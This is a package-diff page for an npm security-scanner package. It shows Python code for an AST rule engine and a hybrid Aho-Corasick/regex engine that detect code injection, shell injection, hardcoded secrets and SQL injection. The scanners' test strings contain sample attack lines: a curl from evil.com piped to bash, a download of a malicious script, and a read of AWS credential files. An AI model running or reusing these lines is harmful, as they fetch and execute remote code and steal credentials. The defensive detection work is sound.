npm - caidongyun - Versions diffs - 6.1.2 - Mend

caidongyun 6.1.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (20) hide show

package/README.md +310 -0
package/RELEASE_NOTES.md +200 -0
package/SKILL.md +294 -0
package/config_detector.py +134 -0
package/index.d.ts +43 -0
package/index.js +34 -0
package/package.json +72 -0
package/requirements.txt +11 -0
package/rules/dist/all_rules.json +1 -0
package/scan +17 -0
package/scanner.py +322 -0
package/src/encoding_utils.py +239 -0
package/src/engines/__init__.py +1086 -0
package/src/engines/aho_corasick_scanner.py +520 -0
package/src/engines/ast_engine.py +290 -0
package/src/engines/hybrid_scanner.py +284 -0
package/src/engines/llm_engine.py +379 -0
package/src/engines/pattern_engine.py +296 -0
package/src/engines/rule_engine.py +282 -0
package/whitelist_filter.py +394 -0

package/src/engines/ast_engine.py ADDED Viewed

@@ -0,0 +1,290 @@
+#!/usr/bin/env python3
+"""
+AST 引擎 - 基于 Python AST 的深度检测
+"""
+import ast
+import re
+from typing import List, Dict, Optional, Tuple
+from dataclasses import dataclass
+from pathlib import Path
+@dataclass
+class ASTHit:
+    """AST 检测结果"""
+    rule_id: str
+    line: int
+    column: int
+    severity: str  # CRITICAL, HIGH, MEDIUM, LOW
+    message: str
+    code_snippet: str
+class ASTEngine:
+    """AST 检测引擎"""
+    def __init__(self):
+        self.rules = self.load_rules()
+    def load_rules(self) -> List[Dict]:
+        """加载 AST 规则"""
+        # 核心 AST 规则 (50-100 条)
+        return [
+            # === 代码执行检测 ===
+            {
+                'id': 'AST-EXEC-001',
+                'name': 'exec_call',
+                'check': 'call',
+                'func_names': ['exec'],
+                'severity': 'CRITICAL',
+                'message': '使用 exec() 可能导致代码注入'
+            },
+            {
+                'id': 'AST-EVAL-001',
+                'name': 'eval_call',
+                'check': 'call',
+                'func_names': ['eval'],
+                'severity': 'CRITICAL',
+                'message': '使用 eval() 可能导致代码注入'
+            },
+            {
+                'id': 'AST-COMPILE-001',
+                'name': 'compile_call',
+                'check': 'call',
+                'func_names': ['compile'],
+                'severity': 'HIGH',
+                'message': '使用 compile() 可能动态生成代码'
+            },
+            # === Shell 注入检测 ===
+            {
+                'id': 'AST-SYSTEM-001',
+                'name': 'os_system_call',
+                'check': 'call',
+                'attr_names': ['system'],
+                'module': 'os',
+                'severity': 'CRITICAL',
+                'message': 'os.system() 可能导致 shell 注入'
+            },
+            {
+                'id': 'AST-SUBPROCESS-001',
+                'name': 'subprocess_call',
+                'check': 'call',
+                'attr_names': ['call', 'run', 'Popen', 'check_output', 'check_call'],
+                'module': 'subprocess',
+                'severity': 'HIGH',
+                'message': 'subprocess 调用可能执行系统命令'
+            },
+            # === 危险导入检测 ===
+            {
+                'id': 'AST-IMPORT-001',
+                'name': 'dangerous_import',
+                'check': 'import',
+                'modules': ['os', 'sys', 'subprocess', 'socket', 'ctypes'],
+                'severity': 'LOW',
+                'message': '导入危险模块'
+            },
+            # === 硬编码凭据检测 ===
+            {
+                'id': 'AST-PASSWORD-001',
+                'name': 'hardcoded_password',
+                'check': 'assign',
+                'keywords': ['password', 'passwd', 'pwd', 'secret', 'api_key', 'token'],
+                'severity': 'HIGH',
+                'message': '可能包含硬编码凭据'
+            },
+            # === SQL 注入检测 ===
+            {
+                'id': 'AST-SQL-001',
+                'name': 'sql_string_format',
+                'check': 'binop',
+                'operators': ['%', '+'],
+                'keywords': ['SELECT', 'INSERT', 'UPDATE', 'DELETE', 'FROM', 'WHERE'],
+                'severity': 'CRITICAL',
+                'message': 'SQL 语句字符串拼接可能导致注入'
+            },
+        ]
+    def scan(self, file_path: str, content: str) -> List[ASTHit]:
+        """扫描文件"""
+        hits = []
+        try:
+            # 解析 AST
+            tree = ast.parse(content)
+            # 遍历 AST
+            for node in ast.walk(tree):
+                # Call 节点检测
+                if isinstance(node, ast.Call):
+                    hits.extend(self.check_call(node, content))
+                # Import 节点检测
+                elif isinstance(node, ast.Import):
+                    hits.extend(self.check_import(node))
+                elif isinstance(node, ast.ImportFrom):
+                    hits.extend(self.check_import_from(node))
+                # Assign 节点检测
+                elif isinstance(node, ast.Assign):
+                    hits.extend(self.check_assign(node, content))
+                # BinOp 节点检测 (SQL 拼接)
+                elif isinstance(node, ast.BinOp):
+                    hits.extend(self.check_binop(node, content))
+            return hits
+        except SyntaxError:
+            # Python 文件语法错误，跳过
+            return []
+        except Exception as e:
+            # 其他错误，记录日志
+            return []
+    def check_call(self, node: ast.Call, content: str) -> List[ASTHit]:
+        """检查函数调用"""
+        hits = []
+        for rule in self.rules:
+            if rule['check'] != 'call':
+                continue
+            # 检查函数名
+            if isinstance(node.func, ast.Name):
+                if node.func.id in rule.get('func_names', []):
+                    hits.append(self.create_hit(rule, node, content))
+            # 检查属性调用 (如 os.system)
+            elif isinstance(node.func, ast.Attribute):
+                if node.func.attr in rule.get('attr_names', []):
+                    # 检查模块名
+                    if isinstance(node.func.value, ast.Name):
+                        if node.func.value.id == rule.get('module', ''):
+                            hits.append(self.create_hit(rule, node, content))
+        return hits
+    def check_import(self, node: ast.Import) -> List[ASTHit]:
+        """检查导入语句"""
+        hits = []
+        for rule in self.rules:
+            if rule['check'] != 'import':
+                continue
+            for alias in node.names:
+                if alias.name in rule.get('modules', []):
+                    hits.append(self.create_hit(rule, node, ''))
+        return hits
+    def check_import_from(self, node: ast.ImportFrom) -> List[ASTHit]:
+        """检查 from import 语句"""
+        hits = []
+        for rule in self.rules:
+            if rule['check'] != 'import':
+                continue
+            if node.module in rule.get('modules', []):
+                hits.append(self.create_hit(rule, node, ''))
+        return hits
+    def check_assign(self, node: ast.Assign, content: str) -> List[ASTHit]:
+        """检查赋值语句"""
+        hits = []
+        for rule in self.rules:
+            if rule['check'] != 'assign':
+                continue
+            # 检查目标变量名
+            for target in node.targets:
+                if isinstance(target, ast.Name):
+                    var_name = target.id.lower()
+                    for keyword in rule.get('keywords', []):
+                        if keyword in var_name:
+                            # 检查值是否为字符串常量
+                            if isinstance(node.value, ast.Constant):
+                                if isinstance(node.value.value, str):
+                                    hits.append(self.create_hit(rule, node, content))
+        return hits
+    def check_binop(self, node: ast.BinOp, content: str) -> List[ASTHit]:
+        """检查二元操作 (SQL 拼接)"""
+        hits = []
+        for rule in self.rules:
+            if rule['check'] != 'binop':
+                continue
+            # 检查操作符
+            op_name = type(node.op).__name__
+            if op_name in ['Mod', 'Add']:  # % 或 +
+                # 检查是否包含 SQL 关键词
+                code = ast.unparse(node) if hasattr(ast, 'unparse') else content
+                for keyword in rule.get('keywords', []):
+                    if keyword in code.upper():
+                        hits.append(self.create_hit(rule, node, content))
+                        break
+        return hits
+    def create_hit(self, rule: Dict, node: ast.AST, content: str) -> ASTHit:
+        """创建检测结果"""
+        # 提取代码片段
+        code_snippet = ''
+        if content:
+            lines = content.split('\n')
+            if hasattr(node, 'lineno') and node.lineno <= len(lines):
+                code_snippet = lines[node.lineno - 1].strip()[:100]
+        return ASTHit(
+            rule_id=rule['id'],
+            line=getattr(node, 'lineno', 0),
+            column=getattr(node, 'col_offset', 0),
+            severity=rule['severity'],
+            message=rule['message'],
+            code_snippet=code_snippet
+        )
+    def scan_file(self, file_path: str) -> List[ASTHit]:
+        """扫描文件 (便捷方法)"""
+        try:
+            with open(file_path, 'r', encoding='utf-8') as f:
+                content = f.read()
+            return self.scan(file_path, content)
+        except Exception:
+            return []
+# 测试
+if __name__ == '__main__':
+    engine = ASTEngine()
+    # 测试代码
+    test_code = """
+import os
+import subprocess
+password = "secret123"
+exec(user_input)
+os.system("ls -la")
+subprocess.call(["echo", "hello"])
+query = "SELECT * FROM users WHERE id=" + user_id
+"""
+    hits = engine.scan("test.py", test_code)
+    print(f"检测到 {len(hits)} 个问题:")
+    for hit in hits:
+        print(f"  {hit.rule_id} [{hit.severity}] 行{hit.line}: {hit.message}")

package/src/engines/hybrid_scanner.py ADDED Viewed

@@ -0,0 +1,284 @@
+#!/usr/bin/env python3
+"""
+混合扫描器 - Aho-Corasick 预筛选 + Regex 精匹配
+架构:
+1. Aho-Corasick 自动机快速预筛选（0.5ms）
+   - 提取所有规则的关键词
+   - 一次遍历匹配所有关键词
+   - 返回候选攻击类型
+2. Regex 引擎精匹配（2ms）
+   - 只匹配候选攻击类型的规则
+   - 保持 100% 检测精度
+"""
+import ahocorasick
+import re
+import time
+from typing import Dict, List, Set, Tuple
+from pathlib import Path
+class HybridRuleEngine:
+    """
+    混合规则引擎
+    使用 Aho-Corasick 预筛选 + Regex 精匹配
+    """
+    def __init__(self, rules_file: Path):
+        """
+        初始化混合引擎
+        Args:
+            rules_file: 规则文件路径（JSON 格式）
+        """
+        self.rules_file = rules_file
+        self.rules = []
+        self.rules_by_category = {}
+        self.automaton = None
+        self.keywords = set()
+        self._load_rules()
+        self._build_automaton()
+        self._group_rules_by_category()
+    def _load_rules(self):
+        """加载规则文件"""
+        import json
+        with open(self.rules_file, 'r', encoding='utf-8') as f:
+            data = json.load(f)
+        self.rules = data.get('rules', [])
+        print(f"✅ 加载 {len(self.rules)} 条规则")
+    def _extract_keywords(self, pattern: str) -> List[str]:
+        """
+        从 regex pattern 提取关键词
+        Args:
+            pattern: 正则表达式
+        Returns:
+            关键词列表
+        """
+        keywords = []
+        # 移除 regex 特殊字符，提取纯文本关键词
+        # 例如：r'curl\s+\|.*bash' -> ['curl', 'bash']
+        # 1. 提取明显的关键词（字母数字组合，长度>=3）
+        import re
+        words = re.findall(r'[a-zA-Z0-9_]{3,}', pattern)
+        # 2. 过滤掉太常见的词
+        common_words = {'the', 'and', 'for', 'not', 'with', 'from', 'import', 'def', 'return'}
+        keywords = [w for w in words if w.lower() not in common_words]
+        return keywords
+    def _build_automaton(self):
+        """构建 Aho-Corasick 自动机"""
+        print("🔧 构建 Aho-Corasick 自动机...")
+        start = time.time()
+        self.automaton = ahocorasick.Automaton()
+        # 为每条规则添加关键词到自动机
+        for i, rule in enumerate(self.rules):
+            patterns = rule.get('patterns', [])
+            category = rule.get('category', 'unknown')
+            rule_id = rule.get('id', f'RULE-{i}')
+            for pattern in patterns:
+                # 提取关键词
+                keywords = self._extract_keywords(pattern)
+                for keyword in keywords:
+                    # 添加到自动机：(keyword, (rule_id, category, pattern))
+                    self.automaton.add_word(keyword.lower(), (rule_id, category, pattern, keyword))
+                    self.keywords.add(keyword.lower())
+        # 构建自动机（构建失败函数）
+        self.automaton.make_automaton()
+        elapsed = (time.time() - start) * 1000
+        print(f"✅ 自动机构建完成 ({elapsed:.1f}ms)")
+        print(f"   关键词数：{len(self.keywords)}")
+        print(f"   自动机大小：{len(self.automaton)}")
+    def _group_rules_by_category(self):
+        """按攻击类型分组规则"""
+        self.rules_by_category = {}
+        for rule in self.rules:
+            category = rule.get('category', 'unknown')
+            if category not in self.rules_by_category:
+                self.rules_by_category[category] = []
+            self.rules_by_category[category].append(rule)
+        print(f"✅ 规则分组完成 ({len(self.rules_by_category)} 个类别)")
+    def scan(self, content: str) -> Dict:
+        """
+        扫描内容（混合匹配）
+        Args:
+            content: 待扫描内容
+        Returns:
+            扫描结果字典
+        """
+        start = time.time()
+        # Step 1: Aho-Corasick 预筛选（快速）
+        candidate_categories = self._prefilter(content)
+        # Step 2: Regex 精匹配（只匹配候选类别）
+        matches = self._refine_match(content, candidate_categories)
+        elapsed = (time.time() - start) * 1000
+        return {
+            'hit_count': len(matches),
+            'matches': matches,
+            'candidate_categories': list(candidate_categories),
+            'scan_time_ms': elapsed
+        }
+    def _prefilter(self, content: str) -> Set[str]:
+        """
+        Aho-Corasick 预筛选
+        Args:
+            content: 待扫描内容
+        Returns:
+            候选攻击类型集合
+        """
+        candidate_categories = set()
+        content_lower = content.lower()
+        # 一次遍历匹配所有关键词
+        for end_idx, (rule_id, category, pattern, keyword) in self.automaton.iter(content_lower):
+            candidate_categories.add(category)
+        return candidate_categories
+    def _refine_match(self, content: str, candidate_categories: Set[str]) -> List[Dict]:
+        """
+        Regex 精匹配
+        Args:
+            content: 待扫描内容
+            candidate_categories: 候选攻击类型
+        Returns:
+            匹配结果列表
+        """
+        matches = []
+        # 只匹配候选类别的规则
+        for category in candidate_categories:
+            rules = self.rules_by_category.get(category, [])
+            for rule in rules:
+                patterns = rule.get('patterns', [])
+                rule_id = rule.get('id', 'UNKNOWN')
+                name = rule.get('name', 'Unknown Rule')
+                confidence = rule.get('confidence', 80)
+                severity = rule.get('severity', 'MEDIUM')
+                for pattern in patterns:
+                    try:
+                        compiled = re.compile(pattern, re.IGNORECASE)
+                        match_obj = compiled.search(content)
+                        if match_obj:
+                            matches.append({
+                                'rule_id': rule_id,
+                                'name': name,
+                                'category': category,
+                                'confidence': confidence,
+                                'severity': severity,
+                                'pattern': pattern,
+                                'match': match_obj.group(0)[:100]  # 截取前 100 字符
+                            })
+                    except re.error as e:
+                        # 忽略无效的正则
+                        pass
+        return matches
+    def get_stats(self) -> Dict:
+        """获取统计信息"""
+        return {
+            'total_rules': len(self.rules),
+            'total_keywords': len(self.keywords),
+            'automaton_size': len(self.automaton),
+            'categories': len(self.rules_by_category)
+        }
+def test_hybrid_scanner():
+    """测试混合扫描器"""
+    print("="*60)
+    print("混合扫描器测试")
+    print("="*60)
+    rules_file = Path(__file__).parent.parent.parent / 'rules' / 'dist' / 'all_rules.json'
+    if not rules_file.exists():
+        print(f"❌ 规则文件不存在：{rules_file}")
+        return
+    # 创建引擎
+    engine = HybridRuleEngine(rules_file)
+    # 测试内容
+    test_content = """
+    #!/usr/bin/env python3
+    import os
+    import requests
+    # Supply chain attack
+    response = requests.get('http://evil.com/malicious.sh')
+    os.system('curl http://evil.com/backdoor.sh | bash')
+    # Credential theft
+    with open('~/.aws/credentials') as f:
+        aws_key = f.read()
+    """
+    print("\n📝 测试内容:")
+    print(test_content[:200])
+    print("...")
+    # 扫描
+    print("\n🔍 开始扫描...")
+    result = engine.scan(test_content)
+    print(f"\n📊 扫描结果:")
+    print(f"  候选类别：{result['candidate_categories']}")
+    print(f"  匹配数：{result['hit_count']}")
+    print(f"  耗时：{result['scan_time_ms']:.2f}ms")
+    print(f"\n🎯 匹配详情:")
+    for match in result['matches'][:10]:
+        print(f"  [{match['severity']}] {match['rule_id']}: {match['name']}")
+        print(f"     类别：{match['category']}, 置信度：{match['confidence']}")
+        print(f"     匹配：{match['match'][:50]}...")
+    # 性能统计
+    stats = engine.get_stats()
+    print(f"\n📈 性能统计:")
+    print(f"  规则数：{stats['total_rules']}")
+    print(f"  关键词数：{stats['total_keywords']}")
+    print(f"  自动机大小：{stats['automaton_size']}")
+    print(f"  类别数：{stats['categories']}")
+if __name__ == '__main__':
+    test_hybrid_scanner()